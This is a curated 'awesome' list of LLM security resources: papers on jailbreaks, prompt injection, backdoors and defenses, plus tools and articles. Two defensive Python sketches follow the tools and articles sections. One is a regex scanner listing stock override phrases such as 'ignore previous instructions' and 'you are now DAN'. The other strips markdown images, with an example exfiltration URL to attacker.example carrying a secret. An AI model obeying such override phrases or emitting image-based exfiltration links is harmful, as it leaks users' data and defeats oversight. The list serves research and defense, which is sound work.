awesome-llm-security

LLM Security Resources

A curation of awesome tools, documents and projects about LLM Security.

Awesome LLM Security / Papers / White-box attack

[paper] "Visual Adversarial Examples Jailbreak Large Language Models", 2023-06, AAAI(Oral) 24, ,
[paper] "Are aligned neural networks adversarially aligned?", 2023-06, NeurIPS(Poster) 23, ,
[paper] "(Ab)using Images and Sounds for Indirect Instruction Injection in Multi-Modal LLMs", 2023-07,
[paper] "Universal and Transferable Adversarial Attacks on Aligned Language Models", 2023-07, ,
[paper] "Jailbreak in pieces: Compositional Adversarial Attacks on Multi-Modal Language Models", 2023-07, ,
[paper] "Image Hijacking: Adversarial Images can Control Generative Models at Runtime", 2023-09, ,
[paper] "Weak-to-Strong Jailbreaking on Large Language Models", 2024-04, ,

Awesome LLM Security / Papers / Black-box attack

[paper] "Not what you've signed up for: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection", 2023-02, AISec@CCS 23
[paper] "Jailbroken: How Does LLM Safety Training Fail?", 2023-07, NeurIPS(Oral) 23,
[paper] "Latent Jailbreak: A Benchmark for Evaluating Text Safety and Output Robustness of Large Language Models", 2023-07,
[paper] "Effective Prompt Extraction from Language Models", 2023-07, ,
[paper] "Multi-step Jailbreaking Privacy Attacks on ChatGPT", 2023-04, EMNLP 23, ,
[paper] "LLM Censorship: A Machine Learning Challenge or a Computer Security Problem?", 2023-07,
[paper] "Jailbreaking chatgpt via prompt engineering: An empirical study", 2023-05,
[paper] "Prompt Injection attack against LLM-integrated Applications", 2023-06,
[paper] "MasterKey: Automated Jailbreak Across Multiple Large Language Model Chatbots", 2023-07, ,
[paper] "GPT-4 Is Too Smart To Be Safe: Stealthy Chat with LLMs via Cipher", 2023-08, ICLR 24, ,
[paper] "Use of LLMs for Illicit Purposes: Threats, Prevention Measures, and Vulnerabilities", 2023-08,
[paper] "Do-Not-Answer: A Dataset for Evaluating Safeguards in LLMs", 2023-08,
[paper] "Detecting Language Model Attacks with Perplexity", 2023-08,
[paper] "Open Sesame! Universal Black Box Jailbreaking of Large Language Models", 2023-09, ,
[paper] "Fine-tuning Aligned Language Models Compromises Safety, Even When Users Do Not Intend To!", 2023-10, ICLR(oral) 24,
[paper] "AutoDAN: Generating Stealthy Jailbreak Prompts on Aligned Large Language Models", 2023-10, ICLR(poster) 24, , ,
[paper] "Jailbreak and Guard Aligned Language Models with Only Few In-Context Demonstrations", 2023-10, CoRR 23, ,
[paper] "Multilingual Jailbreak Challenges in Large Language Models", 2023-10, ICLR(poster) 24,
[paper] "Scalable and Transferable Black-Box Jailbreaks for Language Models via Persona Modulation", 2023-11, SoLaR(poster) 24,
[paper] "DeepInception: Hypnotize Large Language Model to Be Jailbreaker", 2023-11,
[paper] "A Wolf in Sheep’s Clothing: Generalized Nested Jailbreak Prompts can Fool Large Language Models Easily", 2023-11, NAACL 24,
[paper] "AutoDAN: Automatic and Interpretable Adversarial Attacks on Large Language Models", 2023-10,
[paper] "Language Model Inversion", 2023-11, ICLR(poster) 24,
[paper] "An LLM can Fool Itself: A Prompt-Based Adversarial Attack", 2023-10, ICLR(poster) 24,
[paper] "GPTFUZZER: Red Teaming Large Language Models with Auto-Generated Jailbreak Prompts", 2023-09,
[paper] "Many-shot Jailbreaking", 2024-04,
[paper] "Rethinking How to Evaluate Language Model Jailbreak", 2024-04,

Awesome LLM Security / Papers / Backdoor attack

[paper] "BITE: Textual Backdoor Attacks with Iterative Trigger Injection", 2022-05, ACL 23,
[paper] "Prompt as Triggers for Backdoor Attack: Examining the Vulnerability in Language Models", 2023-05, EMNLP 23,
[paper] "Backdooring Instruction-Tuned Large Language Models with Virtual Prompt Injection", 2023-07, NAACL 24,

Awesome LLM Security / Papers / Fingerprinting

[paper] "Instructional Fingerprinting of Large Language Models", 2024-01, NAACL 24
[paper] "TRAP: Targeted Random Adversarial Prompt Honeypot for Black-Box Identification", 2024-02, ACL 24 (findings)
[paper] "LLMmap: Fingerprinting For Large Language Models", 2024-07,

Awesome LLM Security / Papers / Defense

[paper] "Baseline Defenses for Adversarial Attacks Against Aligned Language Models", 2023-09,
[paper] "LLM Self Defense: By Self Examination, LLMs Know They Are Being Tricked", 2023-08, ICLR 24 Tiny Paper, ,
[paper] "Defending Against Alignment-Breaking Attacks via Robustly Aligned LLM", 2023-09, ,
[paper] "Benchmarking and Defending Against Indirect Prompt Injection Attacks on Large Language Models", 2023-12,
[paper] "AutoDefense: Multi-Agent LLM Defense against Jailbreak Attacks", 2024-03,
[paper] "Protecting Your LLMs with Information Bottleneck", 2024-04,
[paper] "PARDEN, Can You Repeat That? Defending against Jailbreaks via Repetition", 2024-05, ICML 24,
[paper] “Adversarial Tuning: Defending Against Jailbreak Attacks for LLMs”, 2024-06,
[paper] "Improving Alignment and Robustness with Circuit Breakers", 2024-06, NeurIPS 24, ,

Awesome LLM Security / Papers / Platform Security

[paper] "LLM Platform Security: Applying a Systematic Evaluation Framework to OpenAI’s ChatGPT Plugins", 2023-09,

Awesome LLM Security / Papers / Survey

[paper] "Survey of Vulnerabilities in Large Language Models Revealed by Adversarial Attacks", 2023-10, ACL 24,
[paper] "Security and Privacy Challenges of Large Language Models: A Survey", 2024-02,
[paper] "Breaking Down the Defenses: A Comparative Survey of Attacks on Large Language Models", 2024-03,
[paper] "Operationalizing a Threat Model for Red-Teaming Large Language Models (LLMs)", 2024-07,

Awesome LLM Security / Benchmark

[paper] "JailbreakBench: An Open Robustness Benchmark for Jailbreaking Large Language Models", 2024-03,
[paper] "AgentDojo: A Dynamic Environment to Evaluate Attacks and Defenses for LLM Agents", 2024-06, NeurIPS 24,
[paper] "AgentHarm: A Benchmark for Measuring Harmfulness of LLM Agents", 2024-10,

Awesome LLM Security / Tools

Plexiglass: a security toolbox for testing and safeguarding LLMs
PurpleLlama: a set of tools to assess and improve LLM security
Rebuff: a self-hardening prompt injection detector
Garak: an LLM vulnerability scanner
LLMFuzzer: a fuzzing framework for LLMs
LLM Guard: a security toolkit for LLM interactions
Vigil: an LLM prompt injection detection toolkit
jailbreak-evaluation: an easy-to-use Python package for language model jailbreak evaluation
Prompt Fuzzer: an open-source tool to help you harden your GenAI applications
WhistleBlower: an open-source tool designed to infer the system prompt of an AI agent from its generated text outputs
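
Several of the tools above (Rebuff, Vigil, LLM Guard) combine heuristics, model-based scanners, and canary tokens to detect prompt injection and prompt leakage. The toy sketch below shows two of those ingredients, a regex heuristic over the input and a canary check on the output; it is illustrative glue code and does not use any of those projects' actual APIs.

```python
# Toy prompt-injection scanner: regex heuristic on input plus a canary token for leakage.
import re
import secrets

INJECTION_PATTERNS = [
    r"ignore (all|any|previous) .*instructions",
    r"disregard (the )?(above|previous)",
    r"you are now (dan|developer mode)",
]

def heuristic_flag(user_input: str) -> bool:
    """Flag inputs matching common injection phrasings."""
    return any(re.search(p, user_input, re.IGNORECASE) for p in INJECTION_PATTERNS)

def add_canary(system_prompt: str) -> tuple[str, str]:
    """Append a random canary to the system prompt; return (prompt, canary)."""
    canary = secrets.token_hex(8)
    return f"{system_prompt}\n[canary:{canary}]", canary

def canary_leaked(model_output: str, canary: str) -> bool:
    """If the canary appears in the output, the system prompt leaked."""
    return canary in model_output
```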

Awesome LLM Security / Articles

Hacking Auto-GPT and escaping its docker container
Prompt Injection Cheat Sheet: How To Manipulate AI Language Models
Indirect Prompt Injection Threats
Prompt injection: What’s the worst that can happen?
OWASP Top 10 for Large Language Model Applications
PoisonGPT: How we hid a lobotomized LLM on Hugging Face to spread fake news
ChatGPT Plugins: Data Exfiltration via Images & Cross Plugin Request Forgery
Jailbreaking GPT-4's code interpreter
Securing LLM Systems Against Prompt Injection
The AI Attack Surface Map v1.0
Adversarial Attacks on LLMs
How Anyone can Hack ChatGPT - GPT4o
LLM Evaluation metrics, framework, and checklist
How RAG Poisoning Made Llama3 Racist!
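
Several of the articles above (e.g. the ChatGPT plugin data-exfiltration write-up) describe the same sink: the model is coaxed into emitting a markdown image whose URL smuggles data out when the client auto-fetches it. Below is a hedged mitigation sketch that strips untrusted image markdown from model output before rendering; the allowlist approach and regex are illustrative, not a complete defense.

```python
# Strip markdown images pointing at untrusted hosts from LLM output before rendering.
import re
from urllib.parse import urlparse

IMAGE_MD = re.compile(r"!\[[^\]]*\]\((?P<url>[^)\s]+)[^)]*\)")

def strip_untrusted_images(markdown: str, allowed_hosts: set[str]) -> str:
    def replace(match: re.Match) -> str:
        host = urlparse(match.group("url")).netloc
        return match.group(0) if host in allowed_hosts else "[image removed]"
    return IMAGE_MD.sub(replace, markdown)

# strip_untrusted_images("![x](https://attacker.example/?q=SECRET)", {"cdn.example.com"})
# -> "[image removed]"
```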

Awesome LLM Security / Other Awesome Projects

0din GenAI Bug Bounty from Mozilla (https://0din.ai): The 0Day Investigative Network is a bug bounty program focusing on flaws within GenAI models. Vulnerability classes include Prompt Injection, Training Data Poisoning, DoS, and more
Gandalf: a prompt injection wargame
LangChain vulnerable to code injection - CVE-2023-29374
LLM Security startups
Adversarial Prompting
Epivolis: a prompt-injection-aware chatbot designed to mitigate adversarial efforts
LLM Security Problems at DEFCON31 Quals: the world's top security competition
PromptBounty.io
PALLMs (Payloads for Attacking Large Language Models)

Awesome LLM Security / Other Useful Resources

@llm_sec (Twitter)
LLM Security (blog)
Embrace The Red (blog)
Kai's Blog (blog)
AI safety takes (newsletter)
Hackstery (newsletter & blog)
